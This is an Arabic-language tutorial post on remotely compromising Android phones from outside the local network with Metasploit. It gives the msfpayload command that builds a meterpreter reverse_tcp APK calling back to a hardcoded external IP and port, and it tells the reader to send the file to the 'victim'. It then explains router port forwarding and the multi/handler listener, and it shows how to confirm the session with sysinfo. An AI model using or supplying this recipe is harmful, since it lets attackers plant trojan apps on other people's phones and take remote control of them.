Android Pentest سيناريو اختراق الاندرويد عن بعد – خارج الشبكة
السلام عليكم
سوف نشرح موضوع مهم الكثير يسئل عنه في اختبار الاختراق وهو
اختراق الاندرويد عن بعد – من خارج الشبكة
طبعاً الاختراق يتم عبر الميتاسبلويت وسوف نشرح فقط جزئية الاختراق الخارجي لن نتطرق الى التفاصيل لأنها موضوع اخر.
مع تنامي توسع نظام اندرويد على الهواتف كان ولا بد من تطوير ايضاً من ملفات لأختراقه وفحصة ايضاً.
دعونا نبداء بالتطبيق اولاً الاختراق لا يختلف عن اختراق الاجهزه او المنصات الاخرى فقط الجديد هو
android/meterpreter/reverse_tcp
امر انشاء البايلود
msfpayload android/meterpreter/reverse_tcp lhost=131.117.163.30 LPORT=1234 R > Desktop/shaja.apk
امر انشاء بايلود
LHOSTطبعاً نركز عنا في
مش لازم يعني تضع هنا الايبي الداخلي لجهازك في الشبكة ويعني الايبي الخاص بك الذي الضحية سوف يقوم الاتصال به .
هنا نضع الايبي الخارجي وتستطيع الحصول عليه من الروتر تبعك او بزيارة احد المواقع مثل
هنا النقطه الهامه في الانشاء
بعد صنع البايلود وأرسالة للهدف نبداء نستقبل الاتصال عبر
multi/handler
نحن وضعنا الايبي الخارجي كيف نستقبل الضحيه ويصل الى جهاز المخترق .
الامر يتم هنا مثل طريقة اختراق الاجهزه يتم فتح بورت للأيبي الخاص بجهاز المخترق الداخلي في الشبكة بالبورت الي تم تحديده اثناء صنع البايلود.
كما في الصورة فتح بورت داخل الشبكة وأعادة توجيه الاتصالات الى الايبي الخاص بجهاز المخترق
طبعاً يتم جلب الايبي في الشبكة عبر الامر
ifconfig
فتحنا الان البورت لعنوان الايبي تبعنا ونبداء التنصت على البايلود الي انشأناه
وندخل كما تحدثنا البورت والايبي الداخلي في التنصت وهنا النقطة في الاختراق الخارجي ما بين انشاء البايلود والتنصت
نبداء بالامر run وونتظر حتى يتم الاتصال
وبعد الاتصال سوف تشاهد عنوان الايبي الخارجي الخاص بالضحية
كما نلاحظ تم الاختراق بالايبي الخارجي .
والنظام المخترق اندوريد
sysinfoنجلب المعلومة عبر الامر
نرجوا بأن تكون الفكرة قد وصلتكم.
انتظرونا في دروس اخرى.
تحياتي
.jpg)
.jpg)
